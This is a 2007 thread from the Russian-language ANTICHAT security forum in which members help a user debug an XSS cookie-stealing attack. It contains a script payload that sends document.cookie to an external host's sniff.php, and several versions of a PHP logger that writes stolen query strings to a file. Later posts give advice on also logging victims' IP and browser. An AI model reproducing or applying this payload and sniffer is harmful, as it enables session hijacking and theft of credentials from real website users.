HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нужна помощь. Видать в запросе...
  #1  
Старый 04.03.2007, 15:37
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
Cool Нужна помощь. Видать в запросе...

Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:
<script&qtdocument.location.href="http://www.humora.net.ru/Files/sniff.php"document.cookie; </script&qt
Где sniff.php содержит такие строки:
PHP код:
<?
 $f 
fopen("snif.txt""a");
 
fwrite($f$REQUEST_URI);
 
fclose($f);
 print(
"OK");
?&
qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie
Подскажите че нетак, плиз, а то не знаю уже че за фигня
 
Ответить с цитированием

  #2  
Старый 04.03.2007, 16:53
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.
 
Ответить с цитированием

  #3  
Старый 04.03.2007, 17:01
TaNkist
Участник форума
Регистрация: 06.04.2006
Сообщений: 257
Провел на форуме:
367179

Репутация: 76
По умолчанию

Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"
 
Ответить с цитированием

  #4  
Старый 04.03.2007, 17:15
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

$_server['query_string']; лучше
 
Ответить с цитированием

  #5  
Старый 04.03.2007, 17:32
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

Cпасибо Чето я и правду запарился) Щас буду пробовать
 
Ответить с цитированием

  #6  
Старый 04.03.2007, 17:38
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять
 
Ответить с цитированием

  #7  
Старый 04.03.2007, 17:42
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

аа все, уже не глючит , новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
===
 
Ответить с цитированием

  #8  
Старый 04.03.2007, 17:42
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

PHP код:
<?php
if($_SERVER['QUERY_STRING']){
    
$f fopen("log""a");
    
fwrite($f$_SERVER['QUERY_STRING']."\n\n");
    
fclose($f);
}
?>
 
Ответить с цитированием

  #9  
Старый 04.03.2007, 18:24
int15
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362

Репутация: 0
По умолчанию

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней ?
 
Ответить с цитированием

  #10  
Старый 08.03.2007, 14:47
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна помощь! Black_Death Болталка 7 11.12.2004 16:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ